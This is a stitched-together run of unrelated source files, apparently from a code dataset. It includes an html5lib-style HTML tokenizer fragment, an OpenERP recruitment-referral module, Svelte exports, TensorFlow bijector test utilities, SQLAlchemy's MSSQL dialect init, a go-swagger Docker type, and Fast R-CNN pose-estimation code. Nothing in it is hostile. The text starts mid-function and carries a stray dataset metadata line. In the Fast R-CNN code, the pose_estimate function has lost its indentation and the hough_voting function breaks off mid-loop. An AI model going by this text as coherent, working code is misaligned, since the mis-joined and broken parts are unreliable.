        self.currentToken["correct"] = False
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "unexpected-char-in-doctype"})
        self.currentToken["correct"] = False
        self.state = self.states["bogusDoctype"]
    return True
def doctypeSystemIdentifierDoubleQuotedState(self):
    """Tokenizer state: inside a double-quoted DOCTYPE system identifier."""
    data = self.stream.char()
    if data == "\"":
        self.state = self.states["afterDoctypeSystemIdentifier"]
    elif data == ">":
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "unexpected-end-of-doctype"})
        self.currentToken["correct"] = False
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-doctype"})
        self.currentToken["correct"] = False
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        self.currentToken["systemId"] += data
    return True
def doctypeSystemIdentifierSingleQuotedState(self):
    """Tokenizer state: inside a single-quoted DOCTYPE system identifier."""
    data = self.stream.char()
    if data == "'":
        self.state = self.states["afterDoctypeSystemIdentifier"]
    elif data == ">":
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "unexpected-end-of-doctype"})
        self.currentToken["correct"] = False
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-doctype"})
        self.currentToken["correct"] = False
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        self.currentToken["systemId"] += data
    return True
def afterDoctypeSystemIdentifierState(self):
    """Tokenizer state: after the system identifier, expecting '>'."""
    data = self.stream.char()
    if data in spaceCharacters:
        pass
    elif data == ">":
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    elif data is EOF:
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "eof-in-doctype"})
        self.currentToken["correct"] = False
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        # Note: unlike sibling states, "correct" is left untouched here.
        self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
            "unexpected-char-in-doctype"})
        self.state = self.states["bogusDoctype"]
    return True
def bogusDoctypeState(self):
    """Tokenizer state: discard characters until '>' or EOF ends the
    malformed DOCTYPE."""
    data = self.stream.char()
    if data == u">":
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    elif data is EOF:
        # XXX EMIT
        self.stream.unget(data)
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        # Everything else inside a bogus doctype is silently dropped.
        pass
    return True
# -*- coding: utf-8 -*-
#/#############################################################################
#
# Jobs Global
# Copyright (C) 2014-TODAY Jobs Global(http://www.jobsglobal.com).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#/#############################################################################
from openerp import api,models
from openerp.osv import osv, fields
from openerp.tools.translate import _
from openerp import tools
class work_experience(osv.osv):
    """One line of a referral's employment history (legacy osv API)."""
    _name = 'work.experience'
    _description = "Work Experience"
    _columns = {
        # Back-reference to the owning manpower.referral record.
        'referral_id': fields.many2one('manpower.referral'),
        'employer_name': fields.char("Name of Employer"),
        'job_title': fields.char('Job Title'),
        'start_date': fields.date("Start Date"),
        'end_date': fields.date("End Date"),
    }
class education_qualification(osv.osv):
    """One line of a referral's education history (legacy osv API)."""
    _name = 'education.qualification'
    _description = "Education Qualification"
    _columns = {
        # Back-reference to the owning manpower.referral record.
        'referral_id': fields.many2one('manpower.referral'),
        'highest_qualification': fields.char("Highest qualification"),
        'institute': fields.char('Institute'),
        'end_date': fields.date("End Date"),
    }
class skills(osv.osv):
    """Master list of skills, linked to referrals via a many2many."""
    _name = 'skills'
    _description = "Skills"
    _order = "id desc"
    _columns = {
        'name': fields.char("Name")
    }
class joined_activities(osv.osv):
    """An activity a referral took part in, newest first."""
    _name = 'joined.activities'
    _description = "Joined Activities"
    _order = "id desc"
    _columns = {
        # Back-reference to the owning manpower.referral record.
        'referral_id': fields.many2one('manpower.referral'),
        'date': fields.datetime("Date"),
        'description': fields.text("Description")
    }
class calendar_event(osv.Model):
    """ Model for Calendar Event """
    # Extends the core calendar.event with a link back to a referral so
    # meetings can be counted/filtered per referral.
    _inherit = 'calendar.event'
    _columns = {
        'referrals_id': fields.many2one('manpower.referral', 'Referral'),
    }
class manpower_referral(osv.osv):
    """A manpower referral (candidate) with CV data, skills, activities
    and scheduled meetings. Mixes legacy osv and new-API (@api.multi)
    methods, as was common in OpenERP 8 transition code."""
    _name = 'manpower.referral'
    _description = "Manpower Referral"
    _inherit = ['mail.thread', 'ir.needaction_mixin']

    def _meeting_count(self, cr, uid, ids, field_name, arg, context=None):
        """Functional-field helper: number of calendar.event records
        linked to each referral id. Returns {referral_id: count}."""
        event = self.pool['calendar.event']
        return {
            ref_id: event.search_count(cr, uid, [('referrals_id', '=', ref_id)], context=context)
            for ref_id in ids
        }

    _columns = {
        'name': fields.char("Name"),
        'no_cv': fields.boolean('No CV'),
        'first_name': fields.char("First Name"),
        'sur_name': fields.char("Sur Name"),
        'age': fields.integer("Age"),
        'location': fields.char("Location"),
        'nationality': fields.many2one('res.country', string="Nationality"),
        'position_referred': fields.char("Position preferred"),  # TO CHANGE
        'current_position': fields.char("Current Position"),  # TO CHANGE
        'work_experience_ids': fields.one2many('work.experience', 'referral_id', "Work Experience"),
        'education_ids': fields.one2many('education.qualification', 'referral_id', "Education"),
        'activity_ids': fields.one2many('joined.activities', 'referral_id', "Joined Activities"),
        'skill_ids': fields.many2many('skills', 'referral_skills_rel', 'skill_id', 'masterskills_id', "Skills"),
        'contact_date': fields.datetime("Contact Date"),
        'user_id': fields.many2one('res.users', 'User'),
        'meeting_count': fields.function(_meeting_count, string='# Meetings', type='integer'),
    }
    _defaults = {
        # Default owner is the creating user.
        'user_id': lambda s, cr, uid, c: uid,
    }

    @api.multi
    def action_upload_cv(self):
        """Open the client-side CV upload page (client action tag)."""
        res = {
            'type': 'ir.actions.client',
            'name': 'Upload CV',
            'tag': 'acesmanpower.uploadpage',
        }
        return res

    @api.multi
    def send_email(self):
        # Placeholder: intentionally a no-op for now.
        return True

    def schedule_meeting(self, cr, uid, ids, context=None):
        """
        Open meeting's calendar view to schedule meeting on current referral.
        :return dict: dictionary value for created Meeting view
        """
        referral = self.browse(cr, uid, ids[0], context)
        res = self.pool.get('ir.actions.act_window').for_xml_id(cr, uid, 'calendar', 'action_calendar_event', context)
        # Invite the current user; partner_ids is built but note it is not
        # passed into the returned context below.
        partner_ids = [self.pool['res.users'].browse(cr, uid, uid, context=context).partner_id.id]
        if referral.user_id.partner_id:
            partner_ids.append(referral.user_id.partner_id.id)
        res['context'] = {
            'search_default_referrals_id': referral.id or False,
            'default_referrals_id': referral.id or False,
            'default_partner_id': referral.user_id.partner_id and referral.user_id.partner_id.id or False,
            'default_name': referral.first_name
        }
        return res

    def joined_activity(self, cr, uid, ids, context=None):
        """Open the joined-activities tree/form views for this referral."""
        models_data = self.pool.get('ir.model.data')
        # NOTE(review): `ids` is rebound to a browse record here, then passed
        # to int() below — confirm int() of a browse record yields the id as
        # intended on this OpenERP version.
        ids = self.browse(cr, uid, ids, context=context)[0]
        # Get opportunity views
        dummy, form_view = models_data.get_object_reference(cr, uid, 'acesmanpower', 'view_manpower_referral_activities_form')
        dummy, tree_view = models_data.get_object_reference(cr, uid, 'acesmanpower', 'view_manpower_referral_activities_tree')
        return {
            'name': _('Joined Activities'),
            'view_type': 'tree',
            'view_mode': 'tree,form',
            'res_model': 'joined.activities',
            'res_id': int(ids),
            'view_id': False,
            'views': [(tree_view or False, 'tree'), (form_view or False, 'form')],
            'type': 'ir.actions.act_window',
            'context': {}
        }
class referral_analysis_report(osv.Model):
    """Read-only reporting model backed by the SQL view
    ``referral_analysis_report`` (created in :meth:`init`)."""
    _name = "referral.analysis.report"
    _auto = False  # backed by a SQL view; the ORM must not create a table
    _description = "Referral Analysis"
    _columns = {
        'create_date': fields.datetime('Creation Date', readonly=True),
        'nbr_cases': fields.integer("# of Cases", readonly=True),
        'user_id': fields.many2one('res.users', 'User', readonly=True),
        # NOTE(review): the SQL view below does not expose a join_id column,
        # so reading this field will fail at the SQL layer — confirm the
        # intended source (e.g. add min(j.id) AS join_id to the view).
        'join_id': fields.many2one('joined.activities', 'Activity', readonly=True),
        'total_activities': fields.integer("# of Activities", readonly=True),
        # The view selects first_name directly, so declare it as a plain
        # read-only char column. The previous declaration,
        # fields.related('manpower.referral.first_name'), passed a single
        # dotted string, which is not a valid related-field definition
        # (fields.related expects a chain of field names plus a type kwarg).
        'first_name': fields.char('First Name', readonly=True),
    }

    def init(self, cr):
        """
        Referral Analysis Report: (re)create the backing SQL view.
        @param cr: the current row, from the database cursor
        """
        tools.drop_view_if_exists(cr, 'referral_analysis_report')
        # Grouping by the primary key m.id lets PostgreSQL accept the
        # ungrouped m.first_name / m.contact_date columns.
        cr.execute("""
            CREATE OR REPLACE VIEW referral_analysis_report AS (
                SELECT
                    m.id,
                    count(m.id) as nbr_cases,
                    m.user_id,
                    m.first_name as first_name,
                    m.contact_date as create_date,
                    (select count(*) from joined_activities where joined_activities.referral_id = m.id) as total_activities,
                    count(j.referral_id) as activities
                FROM
                    manpower_referral m
                    INNER JOIN joined_activities j
                        ON j.referral_id = m.id
                GROUP BY m.id, m.user_id
            )""")
# class manpower_referral_line(osv.osv):
# _name = 'manpower.referral.line'
# _description = "Manpower Referral Details" | unknown | codeparrot/codeparrot-clean | ||
// Client-side entry point: re-export the reactive wrappers around built-in
// objects (Date, Set, Map, URL, URLSearchParams) plus MediaQuery and the
// createSubscriber helper, each implemented in its sibling module.
export { SvelteDate } from './date.js';
export { SvelteSet } from './set.js';
export { SvelteMap } from './map.js';
export { SvelteURL } from './url.js';
export { SvelteURLSearchParams } from './url-search-params.js';
export { MediaQuery } from './media-query.js';
export { createSubscriber } from './create-subscriber.js';
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Bijector unit-test utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.distributions.python.ops import uniform as uniform_lib
from tensorflow.python.framework import ops
from tensorflow.python.ops import math_ops
def assert_finite(array):
  """Raise AssertionError unless every element of `array` is finite."""
  finite_mask = np.isfinite(array)
  if not finite_mask.all():
    raise AssertionError("array was not all finite. %s" % array[:15])
def assert_strictly_increasing(array):
  """Raise unless every element is strictly greater than its predecessor."""
  deltas = np.diff(array)
  np.testing.assert_array_less(0., deltas)
def assert_strictly_decreasing(array):
  """Raise unless every element is strictly less than its predecessor."""
  deltas = np.diff(array)
  np.testing.assert_array_less(deltas, 0.)
def assert_strictly_monotonic(array):
  """Assert `array` is strictly increasing or strictly decreasing,
  choosing the direction from its endpoints."""
  check = (assert_strictly_increasing if array[0] < array[-1]
           else assert_strictly_decreasing)
  check(array)
def assert_scalar_congruency(bijector,
                             lower_x,
                             upper_x,
                             n=int(10e3),
                             rtol=0.01,
                             sess=None):
  """Assert `bijector`'s forward/inverse/inverse_log_det_jacobian are congruent.

  We draw samples `X ~ U(lower_x, upper_x)`, then feed these through the
  `bijector` in order to check that:

  1. the forward is strictly monotonic.
  2. the forward/inverse methods are inverses of each other.
  3. the jacobian is the correct change of measure.

  This can only be used for a Bijector mapping open subsets of the real line
  to themselves.  This is due to the fact that this test compares the `prob`
  before/after transformation with the Lebesgue measure on the line.

  Args:
    bijector:  Instance of Bijector
    lower_x:  Python scalar.
    upper_x:  Python scalar.  Must have `lower_x < upper_x`, and both must be in
      the domain of the `bijector`.  The `bijector` should probably not produce
      huge variation in values in the interval `(lower_x, upper_x)`, or else
      the variance based check of the Jacobian will require small `rtol` or
      huge `n`.
    n:  Number of samples to draw for the checks.
    rtol:  Positive number.  Used for the Jacobian check.
    sess:  `tf.Session`.  Defaults to the default session.

  Raises:
    AssertionError:  If tests fail.
  """
  # Checks and defaults.
  # Only scalar-event bijectors are supported by this check.
  assert bijector.event_ndims.eval() == 0
  if sess is None:
    sess = ops.get_default_session()

  # Should be monotonic over this interval
  ten_x_pts = np.linspace(lower_x, upper_x, num=10).astype(np.float32)
  if bijector.dtype is not None:
    ten_x_pts = ten_x_pts.astype(bijector.dtype.as_numpy_dtype)
  forward_on_10_pts = bijector.forward(ten_x_pts)

  # Set the lower/upper limits in the range of the bijector.
  lower_y, upper_y = sess.run(
      [bijector.forward(lower_x), bijector.forward(upper_x)])
  if upper_y < lower_y:  # If bijector.forward is a decreasing function.
    lower_y, upper_y = upper_y, lower_y

  # Uniform samples from the domain, range.
  uniform_x_samps = uniform_lib.Uniform(
      low=lower_x, high=upper_x).sample(n, seed=0)
  uniform_y_samps = uniform_lib.Uniform(
      low=lower_y, high=upper_y).sample(n, seed=1)

  # These compositions should be the identity.
  inverse_forward_x = bijector.inverse(bijector.forward(uniform_x_samps))
  forward_inverse_y = bijector.forward(bijector.inverse(uniform_y_samps))

  # For a < b, and transformation y = y(x),
  # (b - a) = \int_a^b dx = \int_{y(a)}^{y(b)} |dx/dy| dy
  # "change_measure_dy_dx" below is a Monte Carlo approximation to the right
  # hand side, which should then be close to the left, which is (b - a).
  dy_dx = math_ops.exp(bijector.inverse_log_det_jacobian(uniform_y_samps))
  # E[|dx/dy|] under Uniform[lower_y, upper_y]
  # = \int_{y(a)}^{y(b)} |dx/dy| dP(u), where dP(u) is the uniform measure
  expectation_of_dy_dx_under_uniform = math_ops.reduce_mean(dy_dx)
  # dy = dP(u) * (upper_y - lower_y)
  change_measure_dy_dx = (
      (upper_y - lower_y) * expectation_of_dy_dx_under_uniform)

  # We'll also check that dy_dx = 1 / dx_dy.
  dx_dy = math_ops.exp(
      bijector.forward_log_det_jacobian(bijector.inverse(uniform_y_samps)))

  # Evaluate everything in a single run so all checks share one sample draw.
  [
      forward_on_10_pts_v,
      dy_dx_v,
      dx_dy_v,
      change_measure_dy_dx_v,
      uniform_x_samps_v,
      uniform_y_samps_v,
      inverse_forward_x_v,
      forward_inverse_y_v,
  ] = sess.run([
      forward_on_10_pts,
      dy_dx,
      dx_dy,
      change_measure_dy_dx,
      uniform_x_samps,
      uniform_y_samps,
      inverse_forward_x,
      forward_inverse_y,
  ])

  assert_strictly_monotonic(forward_on_10_pts_v)
  # Composition of forward/inverse should be the identity.
  np.testing.assert_allclose(
      inverse_forward_x_v, uniform_x_samps_v, atol=1e-5, rtol=1e-3)
  np.testing.assert_allclose(
      forward_inverse_y_v, uniform_y_samps_v, atol=1e-5, rtol=1e-3)
  # Change of measure should be correct.
  np.testing.assert_allclose(
      upper_x - lower_x, change_measure_dy_dx_v, atol=0, rtol=rtol)
  # Inverse Jacobian should be equivalent to the reciprocal of the forward
  # Jacobian.
  np.testing.assert_allclose(
      dy_dx_v, np.divide(1., dx_dy_v), atol=1e-5, rtol=1e-3)
def assert_bijective_and_finite(bijector, x, y, atol=0, rtol=1e-5, sess=None):
  """Assert that forward/inverse (along with jacobians) are inverses and finite.

  It is recommended to use x and y values that are very very close to the edge
  of the Bijector's domain.

  Args:
    bijector: A Bijector instance.
    x: np.array of values in the domain of bijector.forward.
    y: np.array of values in the domain of bijector.inverse.
    atol: Absolute tolerance.
    rtol: Relative tolerance.
    sess: TensorFlow session.  Defaults to the default session.

  Raises:
    AssertionError: If tests fail.
  """
  sess = sess or ops.get_default_session()

  # Guard against non-finite incoming points: people often create a crazy
  # range of values for which these end up being bad, especially in 16 bit.
  assert_finite(x)
  assert_finite(y)

  f_x = bijector.forward(x)
  g_y = bijector.inverse(y)

  # Evaluate every tensor of interest in a single session call.
  results = sess.run([
      bijector.inverse(f_x),
      bijector.forward(g_y),
      bijector.inverse_log_det_jacobian(f_x),
      bijector.forward_log_det_jacobian(x),
      bijector.inverse_log_det_jacobian(y),
      bijector.forward_log_det_jacobian(g_y),
      f_x,
      g_y,
  ])
  (x_from_x, y_from_y, ildj_f_x, fldj_x, ildj_y, fldj_g_y, f_x_v,
   g_y_v) = results

  # Everything coming back out of the graph must also be finite.
  for value in results:
    assert_finite(value)

  # forward and inverse must be mutual inverses on the sampled points...
  np.testing.assert_allclose(x_from_x, x, atol=atol, rtol=rtol)
  np.testing.assert_allclose(y_from_y, y, atol=atol, rtol=rtol)
  # ...and the two log-det-jacobians must be negatives of each other.
  np.testing.assert_allclose(-ildj_f_x, fldj_x, atol=atol, rtol=rtol)
  np.testing.assert_allclose(-ildj_y, fldj_g_y, atol=atol, rtol=rtol)
# mssql/__init__.py
# Copyright (C) 2005-2016 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
# Import every DBAPI implementation module so each registers itself with the
# mssql dialect machinery.
from sqlalchemy.dialects.mssql import base, pyodbc, adodbapi, \
    pymssql, zxjdbc, mxodbc

# pyodbc is the default DBAPI used for plain ``mssql://`` URLs.
base.dialect = pyodbc.dialect

# Re-export the SQL Server column types (and the default dialect) at the
# package level for convenient ``from sqlalchemy.dialects.mssql import ...``.
from sqlalchemy.dialects.mssql.base import \
    INTEGER, BIGINT, SMALLINT, TINYINT, VARCHAR, NVARCHAR, CHAR, \
    NCHAR, TEXT, NTEXT, DECIMAL, NUMERIC, FLOAT, DATETIME,\
    DATETIME2, DATETIMEOFFSET, DATE, TIME, SMALLDATETIME, \
    BINARY, VARBINARY, BIT, REAL, IMAGE, TIMESTAMP,\
    MONEY, SMALLMONEY, UNIQUEIDENTIFIER, SQL_VARIANT, dialect

# Public names exposed by ``from sqlalchemy.dialects.mssql import *``.
__all__ = (
    'INTEGER', 'BIGINT', 'SMALLINT', 'TINYINT', 'VARCHAR', 'NVARCHAR', 'CHAR',
    'NCHAR', 'TEXT', 'NTEXT', 'DECIMAL', 'NUMERIC', 'FLOAT', 'DATETIME',
    'DATETIME2', 'DATETIMEOFFSET', 'DATE', 'TIME', 'SMALLDATETIME',
    'BINARY', 'VARBINARY', 'BIT', 'REAL', 'IMAGE', 'TIMESTAMP',
    'MONEY', 'SMALLMONEY', 'UNIQUEIDENTIFIER', 'SQL_VARIANT', 'dialect'
)
// Code generated by go-swagger; DO NOT EDIT.
package container
// This file was generated by the swagger tool.
// Editing this file might prove futile when you re-run the swagger generate command
// NOTE: this type is generated by go-swagger from the API definition;
// regenerate rather than hand-editing if the schema changes.

// CreateResponse ContainerCreateResponse
//
// # OK response to ContainerCreate operation
//
// swagger:model CreateResponse
type CreateResponse struct {

	// The ID of the created container
	// Example: ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743
	// Required: true
	ID string `json:"Id"`

	// Warnings encountered when creating the container
	// Example: []
	// Required: true
	Warnings []string `json:"Warnings"`
}
# --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""Test a Fast R-CNN network on an imdb (image database)."""
from ism.config import cfg, get_output_dir
import argparse
from utils.timer import Timer
import numpy as np
import cv2
import caffe
import cPickle
from utils.blob import im_list_to_blob
import os
import math
import scipy.io
from scipy.optimize import minimize
def _get_image_blob(im, im_depth):
    """Convert a color image and its depth map into network input blobs.

    Arguments:
        im (ndarray): a color image in BGR order
        im_depth (ndarray): the corresponding depth image

    Returns:
        blob (ndarray): data blob holding the mean-subtracted color image
        blob_depth (ndarray): data blob holding the colorized depth image
        im_info (ndarray): 1 x 3 array of (height, width, scale)
        im_scale_factors (ndarray): image scales used (relative to im)
    """
    # Only a single base scale is supported at test time.
    assert len(cfg.TEST.SCALES_BASE) == 1
    scale = cfg.TEST.SCALES_BASE[0]

    # RGB: subtract the pixel means, then rescale.
    im_float = im.astype(np.float32, copy=True) - cfg.PIXEL_MEANS
    im_resized = cv2.resize(im_float, None, None, fx=scale, fy=scale,
                            interpolation=cv2.INTER_LINEAR)
    processed_ims = [im_resized]
    im_scale_factors = [scale]

    # im_info holds (height, width, scale) of the network input.
    im_info = np.hstack((im_resized.shape[:2], scale))[np.newaxis, :]

    # Depth: normalize to [0, 255], replicate into 3 channels so it can be
    # treated like a color image, then subtract the same pixel means.
    depth_float = im_depth.astype(np.float32, copy=True)
    depth_float = depth_float / depth_float.max() * 255
    depth_float = np.tile(depth_float[:, :, np.newaxis], (1, 1, 3))
    depth_float -= cfg.PIXEL_MEANS
    depth_resized = cv2.resize(depth_float, None, None, fx=scale, fy=scale,
                               interpolation=cv2.INTER_LINEAR)
    processed_ims_depth = [depth_resized]

    # Pack the processed images into network blobs.
    blob = im_list_to_blob(processed_ims, 3)
    blob_depth = im_list_to_blob(processed_ims_depth, 3)

    return blob, blob_depth, im_info, np.array(im_scale_factors)
def im_detect(net, im, im_depth, num_classes):
    """Run the network on one RGB-D image and collect its outputs.

    Note: the original docstring documented a ``boxes`` input and an
    R x 4*K output, which this function does not have; rois are produced
    by the network itself.

    Arguments:
        net (caffe.Net): network to use
        im (ndarray): color image to test (in BGR order)
        im_depth (ndarray): depth image
        num_classes (int): number of object classes (currently unused here)

    Returns:
        boxes (ndarray): predicted rois, rescaled to original image coords
        scores (ndarray): scores for the predicted rois
        seg_cls_prob (ndarray): per-pixel class probability map
        seg_view_pred (ndarray): per-pixel viewpoint prediction map
    """
    # compute image blob
    im_blob, im_depth_blob, im_info, im_scale_factors = _get_image_blob(im, im_depth)

    # reshape network inputs to match this image's blob shapes
    net.blobs['data_image'].reshape(*(im_blob.shape))
    net.blobs['data_depth'].reshape(*(im_depth_blob.shape))
    net.blobs['im_info'].reshape(*(im_info.shape))
    blobs_out = net.forward(data_image=im_blob.astype(np.float32, copy=False),
                            data_depth=im_depth_blob.astype(np.float32, copy=False),
                            im_info=im_info.astype(np.float32, copy=False))

    # get outputs; drop the rois' leading batch-index column and undo the
    # input rescaling so boxes are in original-image coordinates
    scale = im_info[0, 2]
    boxes = blobs_out['rois'][:, 1:].copy() / scale
    scores = blobs_out['scores'].copy()
    seg_cls_prob = blobs_out['seg_cls_prob']
    seg_view_pred = blobs_out['seg_view_pred']

    return boxes, scores, seg_cls_prob, seg_view_pred
# backproject pixels into 3D points
def backproject_camera(im_depth, meta_data):
    """Backproject a depth image into a height x width x 3 map of 3D points.

    Each depth value is scaled by 1/meta_data['factor_depth'] and interpreted
    as the distance along the viewing ray through that pixel (the ray is
    normalized to unit length before scaling).  Pixels with zero depth map to
    the point (0, 0, 0).

    Arguments:
        im_depth (ndarray): depth image
        meta_data (dict): holds 'factor_depth' and the 3x3 'intrinsic_matrix'

    Returns:
        points (ndarray): height x width x 3 float32 array of camera-frame
            3D points
    """
    depth = im_depth.astype(np.float32, copy=True) / meta_data['factor_depth']
    height = depth.shape[0]
    width = depth.shape[1]

    # Inverse intrinsics map homogeneous pixels back to viewing rays.
    Kinv = np.linalg.inv(np.matrix(meta_data['intrinsic_matrix']))

    # Homogeneous 2D pixel grid, one row per pixel in raster order.
    x, y = np.meshgrid(np.arange(width), np.arange(height))
    ones = np.ones((height, width), dtype=np.float32)
    x2d = np.stack((x, y, ones), axis=2).reshape(width * height, 3)

    # Backproject to rays, then normalize each ray to unit length...
    rays = Kinv * x2d.transpose()
    rays = np.divide(rays, np.tile(np.linalg.norm(rays, axis=0), (3, 1)))

    # ...and scale each unit ray by its measured depth (distance along ray).
    X = np.multiply(np.tile(depth.reshape(1, width * height), (3, 1)), rays)

    points = np.zeros((height, width, 3), dtype=np.float32)
    points[y, x, 0] = X[0, :].reshape(height, width)
    points[y, x, 1] = X[1, :].reshape(height, width)
    points[y, x, 2] = X[2, :].reshape(height, width)

    # Zero-depth pixels carry no measurement; zero their points explicitly.
    invalid = np.where(im_depth == 0)
    points[invalid[0], invalid[1], :] = 0

    return points
def loss_pose(x, points, cls_label, azimuth_sin_pred, azimuth_cos_pred, elevation_sin_pred):
    """Pose-estimation loss: mean squared error between the azimuth/elevation
    implied by candidate pose x and the per-pixel network predictions.

    Arguments:
        x: 6-vector (rx, ry, rz, cx, cy, cz) of Euler angles and object center
        points (ndarray): height x width x 3 map of 3D points
        cls_label (ndarray): per-pixel labels; only pixels > 0 contribute
        azimuth_sin_pred (ndarray): predicted sin(azimuth) per pixel
        azimuth_cos_pred (ndarray): predicted cos(azimuth) per pixel
        elevation_sin_pred (ndarray): predicted sin(elevation) per pixel

    Returns:
        Scalar loss: average of the three MSE terms.
    """
    rx = x[0]
    ry = x[1]
    rz = x[2]
    C = x[3:6].reshape((3, 1))

    # Rotation matrix from XYZ Euler angles (applied as R = Rz * Ry * Rx).
    Rx = np.matrix([[1, 0, 0],
                    [0, math.cos(rx), -math.sin(rx)],
                    [0, math.sin(rx), math.cos(rx)]])
    Ry = np.matrix([[math.cos(ry), 0, math.sin(ry)],
                    [0, 1, 0],
                    [-math.sin(ry), 0, math.cos(ry)]])
    Rz = np.matrix([[math.cos(rz), -math.sin(rz), 0],
                    [math.sin(rz), math.cos(rz), 0],
                    [0, 0, 1]])
    R = Rz * Ry * Rx

    # Gather the foreground points and move them into the candidate frame.
    index = np.where(cls_label > 0)
    x3d = points[index[0], index[1], :].transpose()
    num = x3d.shape[1]
    X = R * (x3d - np.tile(C, (1, num)))

    # Spherical angles of each transformed point.
    r = np.linalg.norm(X, axis=0)
    elevation_sin = np.sin(np.pi / 2 - np.arccos(np.divide(X[2, :], r)))
    azimuth = np.arctan2(X[1, :], X[0, :])
    azimuth_sin = np.sin(azimuth)
    azimuth_cos = np.cos(azimuth)

    # Average the three mean-squared-error terms over foreground pixels.
    loss = (np.mean(np.power(azimuth_sin - azimuth_sin_pred[index[0], index[1]], 2)) +
            np.mean(np.power(azimuth_cos - azimuth_cos_pred[index[0], index[1]], 2)) +
            np.mean(np.power(elevation_sin - elevation_sin_pred[index[0], index[1]], 2))) / 3
    return loss
def pose_estimate(im_depth, meta_data, cls_prob, center_pred):
""" estimate the pose of object from network predication """
# compute 3D points in camera coordinate framework
points = backproject_camera(im_depth, meta_data)
# rescale the 3D point map
height = center_pred.shape[2]
width = center_pred.shape[3]
im_depth_rescale = cv2.resize(im_depth, dsize=(height, width), interpolation=cv2.INTER_NEAREST)
points_rescale = cv2.resize(points, dsize=(height, width), interpolation=cv2.INTER_NEAREST)
# find the max cls labels
num_channels = 3
cls_label = np.argmax(cls_prob, axis = 1).reshape((height, width))
x, y = np.meshgrid(np.arange(width), np.arange(height))
azimuth_sin_pred = center_pred[:, num_channels*cls_label+0, y, x].reshape((height, width))
azimuth_cos_pred = center_pred[:, num_channels*cls_label+1, y, x].reshape((height, width))
elevation_sin_pred = center_pred[:, num_channels*cls_label+2, y, x].reshape((height, width))
# optimization
# initialization
x0 = np.zeros((6,1), dtype=np.float32)
index = np.where(im_depth > 0)
x3d = points[index[0], index[1], :]
x0[3:6] = np.mean(x3d, axis=0).reshape((3,1))
xmin = np.min(x3d, axis=0)
xmax = np.max(x3d, axis=0)
factor = 2
bounds = ((-np.pi, np.pi), (-np.pi, np.pi), (-np.pi, np.pi), (factor*xmin[0], factor*xmax[0]), (factor*xmin[1], factor*xmax[1]), (xmin[2], None))
res = minimize(loss_pose, x0, (points_rescale, cls_label, azimuth_sin_pred, azimuth_cos_pred, elevation_sin_pred), method='SLSQP', bounds=bounds, options={'disp': True})
print res.x
# transform the points
rx = res.x[0]
ry = res.x[1]
rz = res.x[2]
C = res.x[3:6].reshape((3,1))
# construct rotation matrix
Rx = np.matrix([[1, 0, 0], [0, math.cos(rx), -math.sin(rx)], [0, math.sin(rx), math.cos(rx)]])
Ry = np.matrix([[math.cos(ry), 0, math.sin(ry)], [0, 1, 0], [-math.sin(ry), 0, math.cos(ry)]])
Rz = np.matrix([[math.cos(rz), -math.sin(rz), 0], [math.sin(rz), math.cos(rz), 0], [0, 0, 1]])
R = Rz * Ry * Rx
# transform the points
index = np.where(im_depth_rescale > 0)
x3d = points_rescale[index[0], index[1], :].transpose()
num = x3d.shape[1]
Cmat = np.tile(C, (1, num))
points_transform = R * (x3d - Cmat)
return points_rescale, np.array(points_transform)
def hough_voting(cls_prob, center_pred):
    """ compute the Hough voting space

    For each non-background class, treats the predicted 2D direction at each
    pixel as defining a line through that pixel, accumulates votes for pixels
    lying near the lines, and visualizes the vote map plus a bounding box
    around the winning cell.  Debug/visualization only; returns nothing.

    NOTE(review): num_channels is 5 here while the rest of this file indexes
    center_pred with 3 channels per class — confirm which layout is current.
    """
    num_channels = 5
    num_classes = cls_prob.shape[1]
    height = center_pred.shape[2]
    width = center_pred.shape[3]
    x, y = np.meshgrid(np.arange(width), np.arange(height))
    # construct the 2D points matrix (one row per pixel, raster order)
    x2d = np.stack((x, y), axis=2).reshape(width*height, 2)

    # for each class (0 is background and is skipped)
    for i in range(1, num_classes):
        vote = np.zeros((width*height, ), dtype=np.float32)
        # per-cell bounding box of the voting pixels
        x1 = np.inf * np.ones((width*height, ), dtype=np.float32)
        y1 = np.inf * np.ones((width*height, ), dtype=np.float32)
